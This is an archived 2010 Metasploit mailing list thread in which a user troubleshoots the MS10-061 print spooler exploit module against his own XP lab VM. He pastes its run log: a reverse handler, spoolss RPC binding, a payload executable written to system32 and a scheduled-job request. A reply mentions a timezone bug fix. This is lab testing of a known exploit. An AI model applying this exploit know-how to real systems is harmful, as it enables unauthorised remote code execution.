Metasploit mailing list archives

Re: ms10_061_spoolss.rb working for anyone?


From: hacksauce <metasploit () hacksauce com>
Date: Thu, 23 Sep 2010 11:51:29 -0600

On an XP SP3 VM (VMware) I created a printer (there isn't really a
printer there) and shared it. When I run the exploit I get:

[*] Started reverse handler on 192.168.208.129:31337
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.208.131[\spoolss]
...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.208.131[\spoolss]
...
[*] Attempting to exploit MS10-061 via \\192.168.208.131\HP ...
[*] Printer handle: 00000000423833d8963203429ecf5e3f9d1a3e2f
[*] Job started: 0x2

[*] Wrote 73802 bytes to %SystemRoot%\system32\2hvWFCf29WnRxV.exe
[*] Job started: 0x3
[*] Wrote bind request for \\192.168.208.131\PIPE\ATSVC (72 bytes)
[*] Wrote 96 bytes of NetrAddJob request
[*] Everything should be set, waiting up to two minutes for a session...
[*] Exploit completed, but no session was created.

I checked the victim, and 2hvWFCf29WnRxV.exe doesn't exist in the
system32 folder.
I've attached the output of filemon (filtered on system32) while the
exploit is running, and I don't see the exploit exe being created.
I've checked at and I'm not seeing a scheduled task at all.

1. Does the printer have to physically exist? I noticed that when I
changed the port from lpt to file, I get jobs queued up, that need to
be saved...

2. When the exploit succeeds, is there a job left in the scheduled
tasks folder?

James


On Tue, Sep 21, 2010 at 10:23 AM, HD Moore <hdm () metasploit com> wrote:
> On 9/21/2010 11:17 AM, Richard Miles wrote:
>> I tested the new ms10_061_spoolss.rb but it's not working against my
>> unpatched box. Anyone with success? Can you please provide details
>> about target? And details if you used any unusual param on the
>> exploit?
>
> If you live someplace with a +GMT time zone, update and try the latest.
> A bug was fixed that caused the wrong scheduler time to be used.
>
> -HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Attachment: MS10-061.LOG